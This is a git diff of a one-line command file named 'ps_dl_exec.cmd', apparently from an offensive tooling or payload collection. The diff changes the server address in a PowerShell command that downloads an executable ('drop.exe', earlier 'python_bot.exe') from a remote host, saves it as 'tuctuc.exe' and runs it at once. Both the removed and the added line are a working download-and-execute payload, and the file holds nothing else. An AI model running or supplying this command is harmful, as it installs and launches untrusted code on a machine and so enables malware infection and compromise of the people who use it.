diff --git a/resources/community/ps_dl_exec.cmd b/resources/community/ps_dl_exec.cmd index d823404..38593b0 100644 --- a/resources/community/ps_dl_exec.cmd +++ b/resources/community/ps_dl_exec.cmd @@ -1 +1 @@ -powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.5.15:5000/uploads/python_bot.exe','tuctuc.exe');Start-Process 'tuctuc.exe';exit; \ No newline at end of file +powershell (New-Object System.Net.WebClient).DownloadFile('http://10.5.5.10:5000/drop.exe','tuctuc.exe');Start-Process 'tuctuc.exe';exit; \ No newline at end of file